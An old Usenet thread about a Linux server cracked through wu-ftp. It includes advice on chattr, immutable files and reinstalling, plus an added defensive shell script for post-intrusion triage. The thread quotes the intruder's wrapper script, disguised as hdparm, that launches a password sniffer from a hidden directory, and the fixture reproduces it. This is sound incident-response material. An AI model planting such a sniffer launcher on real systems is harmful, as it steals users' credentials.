Re: ftp was hacked

From: Ed Turner
Date: Sun, 30 Dec 2001 04:32:00 GMT

    You want to use 'chattr' to see if the hacker changed the immutable bit on the file. If this was set, no
    one, not even root, can erase, rename, modify, or do anything to it. It has to be unset by root using this
    command; then you should be able to do whatever it is you need to do.

    Ed Turner
    Chicago, IL

    Bill Unruh wrote:

    > In <> "R.A.Wilson" <> writes:
    > ]Hi -
    > ]I have some info to pass along, and a question...
    > ]A cracker exploited a hole in wu-ftp 2.6.0 and managed to install
    > ]a sniffer and a port scanner on my machine. I use slackware, 2.2.16
    > ]The only reason I found out is that a sharp Linux administrator noted
    > ]port scans coming from my machine and wanted to know what was going on.
    > ]I looked like the bad guy.
    > ]After a lot of work, I found the intruder had made a directory where
    > ]he put his sniffer log and other programs. He had them set up in:
    > ] /dev/ida/.inet
    > ]I don't believe that's a legitimate directory.
    > ]When I looked at a file called tcp.log, in that directory, I was
    > ]stunned to see he had plain text passwords of all the users on my
    > ]machine. I couldn't pull the plug fast enough!
    > ]He also had managed to put an illegal account in /etc/passwd. He used
    > ]the account name www. I found files belonging to www and rm'd them.
    > ]I also took him out of the passwd file. I updated wu-ftp to the latest
    > ]version of 2.6.2 and thought that solved the problem.
    > ]A few days later I wanted to install a later version of hdparm. I was
    > ]using version 3.9 and 4.6 was out. I did a 'locate hdparm' and found
    > ]two of them: one in /usr/bin/hdparm and the other in /usr/sbin/hdparm.
    > ]Which was correct? I did 'which hdparm' and found the one in /usr/sbin
    > ]was it. It was also a binary file. Curious, I looked at the other one.
    > ]This is what it looked like:
    > ] #!/bin/sh
    > ] cd /dev/ida/.inet
    > ] ./sshdu -f ./s
    > ] ./linsniffer >> ./tcp.log &
    > ] cd /
    > ]So, just by a lucky accident I had discovered the intruder's script to
    > ]call his sniffer.
    > ]I tried to move the file. I tried to edit the file. I tried to remove
    > ]it. Nothing. Root cannot touch it! Here's the system message I get
    > ]when I try any of the above...
    > ] cannot unlink 'hdparm': Operation not permitted.
    > ]Now my question... HOW THE HELL DO I GET RID OF THIS GARBAGE???
    > ] -Roy Wilson-
    > ]===================================================================
    > What you do is to backup all of your users files and then you wipe the
    > disk and reinstall, making sure that you install all of the security
    > patches. Then you replace the backup material that you need. Then you
    > scan all of that backed-up material for suid files and get rid of them.
    > e.g.
    > find /home -perm /6000 -ls
    > PS In answer to your question, read
    > man chattr, especially the -i flag.
    > But as you have discovered the chances of your finding all of the
    > backdoors he has installed are nil.
    > So do not try. Just reinstall, and remember to keep up with security
    > patches. That hole was patched about a year ago.
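The three checks the thread turns on (which files carry the immutable or append-only attribute, which files in a restored home tree are setuid/setgid, and which "binaries" in a system bin directory are really wrapper scripts shadowing the real program) collected as POSIX sh functions. This is an added example, not code from Ed, Bill or Roy: it assumes GNU/Linux with e2fsprogs (`lsattr` to read attributes, `chattr` to change them), and every path under the `make_fixture` directory is a constructed stand-in for what Roy describes. Note that `lsattr`, not `chattr`, is the command that shows the attribute; `chattr -i` clears it, and the `a` (append-only) attribute blocks deletion just as `i` does. The `find` form below replaces the `-perm +6000` spelling, which current GNU findutils no longer accepts, with a portable test for either bit.

```shell
#!/bin/sh
# Post-intrusion triage helpers for the case in the thread (added example).
# Assumes GNU/Linux with e2fsprogs (lsattr/chattr). Fixture paths are constructed.

# --- 1. Immutable / append-only attributes --------------------------------
# lsattr prints a flag column, a space, then the path, e.g.
#   ----i--------e-- /usr/bin/hdparm
# 'i' (immutable) or 'a' (append-only) in that column is what makes even
# root's rm/mv fail with "Operation not permitted". Returns 0 when either is set.
lsattr_flags_locked() {
    flags=${1%% *}                       # text before the first space
    case $flags in
        *[!A-Za-z-]*) return 1 ;;        # not a flag column (dir header, blank line, path)
        *i*|*a*)      return 0 ;;
        *)            return 1 ;;
    esac
}

# Walk a tree with lsattr -R and print every locked path.
list_locked_files() {
    command -v lsattr >/dev/null 2>&1 || { echo "lsattr not installed" >&2; return 2; }
    lsattr -R "$1" 2>/dev/null | while IFS= read -r line; do
        lsattr_flags_locked "$line" && printf '%s\n' "${line#* }"
    done
}

# Clear both attributes, then remove. Needs root (CAP_LINUX_IMMUTABLE).
unlock_and_remove() {
    chattr -ia "$1" && rm -f "$1"
}

# --- 2. setuid/setgid files in restored user data -------------------------
# Portable replacement for the GNU-only "-perm +6000": matches either bit.
find_setid_files() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print
}

# --- 3. Shell scripts where a binary belongs ------------------------------
# Roy's /usr/bin/hdparm was a wrapper script shadowing the real binary.
# Print every regular file directly under the given directories that starts
# with a "#!" line; in /usr/bin or /usr/sbin each one deserves a look.
find_scripts_in_bindirs() {
    for d in "$@"; do
        find "$d" -maxdepth 1 -type f -print 2>/dev/null
    done | while IFS= read -r f; do
        [ "$(head -c 2 "$f" 2>/dev/null)" = '#!' ] && printf '%s\n' "$f"
    done
}

# Every copy of a command name along a PATH-style list (default: $PATH),
# the check that turned up two hdparm files in the thread.
find_in_path() {
    name=$1 list=${2:-$PATH}
    ( IFS=:; set -f
      for d in $list; do [ -f "$d/$name" ] && printf '%s\n' "$d/$name"; done; : )
}

# --- Constructed fixture: a tiny tree mirroring Roy's findings -------------
make_fixture() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/bin" "$root/sbin" "$root/home/roy"
    printf 'stand-in for the real hdparm binary\n' > "$root/sbin/hdparm"
    printf '#!/bin/sh\ncd /dev/ida/.inet\n./linsniffer >> ./tcp.log &\n' > "$root/bin/hdparm"
    chmod 755 "$root/bin/hdparm" "$root/sbin/hdparm"
    : > "$root/home/roy/.backdoor";  chmod 4755 "$root/home/roy/.backdoor"   # planted setuid file
    : > "$root/home/roy/notes.txt";  chmod 644  "$root/home/roy/notes.txt"   # ordinary user data
    printf '%s\n' "$root"
}

demo() {
    root=$(make_fixture) || return 1
    echo "scripts in bin dirs:"; find_scripts_in_bindirs "$root/bin" "$root/sbin"
    echo "setuid/setgid files:"; find_setid_files "$root/home"
    echo "copies of hdparm:";    find_in_path hdparm "$root/bin:$root/sbin"
    echo "locked by attribute:"; list_locked_files "$root" || true
    rm -rf "$root"
}

demo
```

On a live box, run `list_locked_files /usr /sbin /dev /etc` (one tree at a time) and `find_scripts_in_bindirs /bin /sbin /usr/bin /usr/sbin` before wiping, and `find_setid_files /home` over the restored backup afterwards. None of this changes Bill's point: once a sniffer and a root-level backdoor are on the host, the reinstall is the fix and these checks only tell you what to carry over and what to leave behind.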